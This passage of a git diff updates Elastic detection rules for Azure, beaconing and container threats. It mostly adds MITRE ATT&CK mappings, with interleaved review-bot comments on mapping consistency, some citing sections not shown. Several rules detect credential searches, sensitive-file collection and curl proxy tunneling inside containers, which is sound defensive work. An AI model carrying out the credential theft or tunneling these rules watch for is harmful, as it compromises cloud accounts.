@@ -2,7 +2,7 @@ creation_date = "2025/06/13" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -81,19 +81,31 @@ event.dataset: "azure.signinlogs" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.005" name = "Device Registration" reference = "https://attack.mitre.org/techniques/T1098/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/azure/persistence_entra_id_suspicious_cloud_device_registration.toml b/rules/integrations/azure/persistence_entra_id_suspicious_cloud_device_registration.toml index e292a7a70db..d3b95428b80 100644 --- a/rules/integrations/azure/persistence_entra_id_suspicious_cloud_device_registration.toml +++ b/rules/integrations/azure/persistence_entra_id_suspicious_cloud_device_registration.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/13" integration = ["azure"] maturity = "production" -updated_date = "2026/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
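Review bot: The new Defense Evasion block at the end of the second hunk maps the parent technique T1550 only, whereas the first section in this chunk maps the same token-misuse behaviour to the T1550.001 Application Access Token sub-technique; if the ADRS token request is the same kind of token misuse, the sub-technique would be the consistent choice, otherwise a one-line `# parent T1550 is intentional: ...` comment above the block would help the next reviewer. The technique/tactic pairing itself is valid, and the rest of the hunk only re-spaces existing entries.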
@@ -106,19 +106,36 @@ sequence by azure.correlation_id with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.005" name = "Device Registration" reference = "https://attack.mitre.org/techniques/T1098/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.005" +name = "Device Registration" +reference = "https://attack.mitre.org/techniques/T1098/005/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml b/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml index 2ca71e31d2f..94600da21cf 100644 --- a/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml +++ b/rules/integrations/azure/persistence_entra_id_tenant_domain_federation_via_audit_logs.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/03" integration = ["azure"] maturity = "development" -updated_date = "2026/03/03" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -95,35 +95,64 @@ event.dataset: azure.auditlogs [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] id = "T1484.002" name = "Trust Modification" reference = "https://attack.mitre.org/techniques/T1484/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.007" +name = "Hybrid Identity" +reference = "https://attack.mitre.org/techniques/T1556/007/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.007" +name = "Hybrid Identity" +reference = "https://attack.mitre.org/techniques/T1556/007/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_application.toml b/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_application.toml index 0491e8e6a55..dcc9cdf623e 100644 
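Review bot: T1484.002 Trust Modification stays under Privilege Escalation only, while the sibling persistence_entra_id_service_principal_federated_issuer_modified.toml section earlier in this chunk adds the same sub-technique under a Defense Evasion block; this rule also covers a federation trust change, so confirm whether T1484.002 belongs in the new TA0005 block here too, or record why not. Separately, the added `+[[rule.threat.technique]]` and `+[[rule.threat.technique.subtechnique]]` lines for T1556 inside the Persistence block carry no blank-line separators, unlike every other addition in this hunk; the same appears to hold for the T1098.003 sub-technique added in persistence_event_hub_created_or_updated.toml and the T1098.006 lines in privilege_escalation_kubernetes_aks_rolebinding_created.toml. Adding the `+` blank lines keeps these files uniform with the normalised layout the commit otherwise applies.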
--- a/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_application.toml +++ b/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_application.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/20" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -68,26 +68,39 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Add owner to a [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_service_principal.toml b/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_service_principal.toml index 0d51d53cae8..fd050eb7fb6 100644 --- a/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_service_principal.toml +++ b/rules/integrations/azure/persistence_entra_id_user_added_as_owner_for_azure_service_principal.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/08/20" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -73,23 +73,36 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Add owner to s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml b/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml index ab26fc86d1c..d9fa2d2aa9f 100644 --- a/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml +++ b/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/16" integration = ["azure"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -84,39 +84,57 @@ event.dataset: "azure.signinlogs" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.005" name = "Device Registration" reference = "https://attack.mitre.org/techniques/T1098/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "azure.signinlogs.properties.user_principal_name", diff --git a/rules/integrations/azure/persistence_event_hub_created_or_updated.toml b/rules/integrations/azure/persistence_event_hub_created_or_updated.toml index 6cf84594742..8752c55c138 100644 --- a/rules/integrations/azure/persistence_event_hub_created_or_updated.toml +++ b/rules/integrations/azure/persistence_event_hub_created_or_updated.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -78,30 +78,54 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.005" name = "Cloud Instance Metadata API" reference = "https://attack.mitre.org/techniques/T1552/005/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml b/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml index fa59f5be650..b0db0824583 100644 --- a/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml +++ b/rules/integrations/azure/persistence_graph_eam_addition_or_modification.toml @@ -2,7 +2,7 @@ creation_date = "2025/07/14" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
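Review bot: The T1098.003 Additional Cloud Roles sub-technique is added to both the Persistence block and the new Privilege Escalation block, yet the hunk header's query context (`azure.activitylogs.operation_name:"MICROSOF…`) appears to be an Event Hub resource operation rather than a role assignment; confirm against the full query, which is outside the hunk, that this rule actually observes a role being granted, otherwise the parent T1098 alone (as before) is the more defensible mapping. The `updated_date` hunk and the blank-line re-spacing in this section are fine.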
@@ -75,22 +75,39 @@ event.dataset: azure.graphactivitylogs and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" + [[rule.threat.technique.subtechnique]] id = "T1556.009" name = "Conditional Access Policies" reference = "https://attack.mitre.org/techniques/T1556/009/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.009" +name = "Conditional Access Policies" +reference = "https://attack.mitre.org/techniques/T1556/009/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["azure.graphactivitylogs.properties.user_principal_object_id"] diff --git a/rules/integrations/azure/persistence_identity_protect_alert_followed_by_device_reg.toml b/rules/integrations/azure/persistence_identity_protect_alert_followed_by_device_reg.toml index af9bc41d8c9..757b281be62 100644 --- a/rules/integrations/azure/persistence_identity_protect_alert_followed_by_device_reg.toml +++ b/rules/integrations/azure/persistence_identity_protect_alert_followed_by_device_reg.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -81,25 +81,26 @@ sequence with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.005" -name = "Device Registration" -reference = "https://attack.mitre.org/techniques/T1098/005/" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.005" +name = "Device Registration" +reference = "https://attack.mitre.org/techniques/T1098/005/" [rule.threat.tactic] id = "TA0003" diff --git a/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml b/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml index de9b0f23509..658060292b8 100644 --- a/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml +++ b/rules/integrations/azure/privilege_escalation_azure_rbac_administrator_roles_assigned.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/15" integration = ["azure"] maturity = "production" -updated_date = "2025/09/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -93,18 +93,36 @@ event.dataset: azure.activitylogs and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml b/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml index 0f07d5c9080..fa9e622f40b 100644 --- a/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml +++ b/rules/integrations/azure/privilege_escalation_entra_id_elevate_to_user_administrator_access.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/22" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] 
@@ -90,22 +90,39 @@ event.dataset: azure.auditlogs [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["azure.auditlogs.properties.initiated_by.user.userPrincipalName"] diff --git a/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml b/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml index eae2f416a42..b400b2509d4 100644 --- a/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml +++ b/rules/integrations/azure/privilege_escalation_kubernetes_aks_rolebinding_created.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/18" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Austin Songer"] 
@@ -82,30 +82,46 @@ event.outcome:(Success or success) [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.006" +name = "Additional Container Cluster Roles" +reference = "https://attack.mitre.org/techniques/T1098/006/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.006" +name = "Additional Container Cluster Roles" +reference = "https://attack.mitre.org/techniques/T1098/006/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/beaconing/command_and_control_beaconing.toml b/rules/integrations/beaconing/command_and_control_beaconing.toml index f89fe47c8c3..5b75f76288e 100644 --- a/rules/integrations/beaconing/command_and_control_beaconing.toml +++ b/rules/integrations/beaconing/command_and_control_beaconing.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["beaconing", "endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -95,19 +95,23 @@ Statistical models analyze network traffic patterns to identify anomalies indica [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique]] id = "T1102" name = "Web Service" reference = "https://attack.mitre.org/techniques/T1102/" + [[rule.threat.technique.subtechnique]] id = "T1102.002" name = "Bidirectional Communication" reference = "https://attack.mitre.org/techniques/T1102/002/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/integrations/beaconing/command_and_control_beaconing_high_confidence.toml b/rules/integrations/beaconing/command_and_control_beaconing_high_confidence.toml index 0fe0d4d7320..26026a63b9d 100644 --- a/rules/integrations/beaconing/command_and_control_beaconing_high_confidence.toml +++ b/rules/integrations/beaconing/command_and_control_beaconing_high_confidence.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/22" integration = ["beaconing", "endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -90,19 +90,23 @@ Statistical models analyze network traffic patterns to identify anomalies indica [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique]] id = "T1102" name = "Web Service" reference = "https://attack.mitre.org/techniques/T1102/" + [[rule.threat.technique.subtechnique]] id = "T1102.002" name = "Bidirectional Communication" reference = "https://attack.mitre.org/techniques/T1102/002/" - - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - 
diff --git a/rules/integrations/cloud_defend/command_and_control_curl_socks_proxy_detected_inside_container.toml b/rules/integrations/cloud_defend/command_and_control_curl_socks_proxy_detected_inside_container.toml index 98c2b0a4e53..a49b73ed4f7 100644 --- a/rules/integrations/cloud_defend/command_and_control_curl_socks_proxy_detected_inside_container.toml +++ b/rules/integrations/cloud_defend/command_and_control_curl_socks_proxy_detected_inside_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/27" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -71,6 +71,11 @@ process.interactive == true and container.id like "?*" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml b/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml index 5d448150ea9..eb6374efd8e 100644 --- a/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml +++ b/rules/integrations/cloud_defend/command_and_control_interactive_file_download_from_internet.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -95,35 +95,40 @@ process where host.os.type == "linux" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" - [[rule.threat.technique]] - name = "Application Layer Protocol" - id = "T1071" - reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" - [[rule.threat.technique.subtechnique]] - name = "Web Protocols" - id = "T1071.001" - reference = "https://attack.mitre.org/techniques/T1071/001/" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique]] - id = "T1059" - name = "Command and Scripting Interpreter" - reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" - [[rule.threat.technique.subtechnique]] - name = "Unix Shell" - id = "T1059.004" - reference = "https://attack.mitre.org/techniques/T1059/004/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" 
diff --git a/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml b/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml index 0e1b024eb19..5a9bac0b72e 100644 --- a/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml +++ b/rules/integrations/cloud_defend/command_and_control_tunneling_and_port_forwarding.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -96,6 +96,11 @@ process where event.type == "start" and event.action == "exec" and ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/integrations/cloud_defend/credential_access_cloud_creds_search_inside_a_container.toml b/rules/integrations/cloud_defend/credential_access_cloud_creds_search_inside_a_container.toml index 66fa6456e01..aeef03f2cd3 100644 --- a/rules/integrations/cloud_defend/credential_access_cloud_creds_search_inside_a_container.toml +++ b/rules/integrations/cloud_defend/credential_access_cloud_creds_search_inside_a_container.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -94,3 +94,16 @@ reference = "https://attack.mitre.org/techniques/T1552/001/"
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1083"
+name = "File and Directory Discovery"
+reference = "https://attack.mitre.org/techniques/T1083/"
+
+[rule.threat.tactic]
+id = "TA0007"
+name = "Discovery"
+reference = "https://attack.mitre.org/tactics/TA0007/"
diff --git a/rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml b/rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml
index 67fbebdda38..6bb349847f8 100644
--- a/rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml
+++ b/rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml
@@ -4,7 +4,7 @@ integration = ["cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/01/15"
+updated_date = "2026/03/24"

 [rule]
 author = ["Elastic"]
@@ -125,6 +125,11 @@ reference = "https://attack.mitre.org/tactics/TA0006/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"

+[[rule.threat.technique]]
+id = "T1005"
+name = "Data from Local System"
+reference = "https://attack.mitre.org/techniques/T1005/"
+
 [[rule.threat.technique]]
 id = "T1560"
 name = "Archive Collected Data"
diff --git a/rules/integrations/cloud_defend/credential_access_sensitive_keys_or_passwords_search_inside_a_container.toml b/rules/integrations/cloud_defend/credential_access_sensitive_keys_or_passwords_search_inside_a_container.toml
index 6466f00e4a8..e7d2d276fcd 100644
--- a/rules/integrations/cloud_defend/credential_access_sensitive_keys_or_passwords_search_inside_a_container.toml
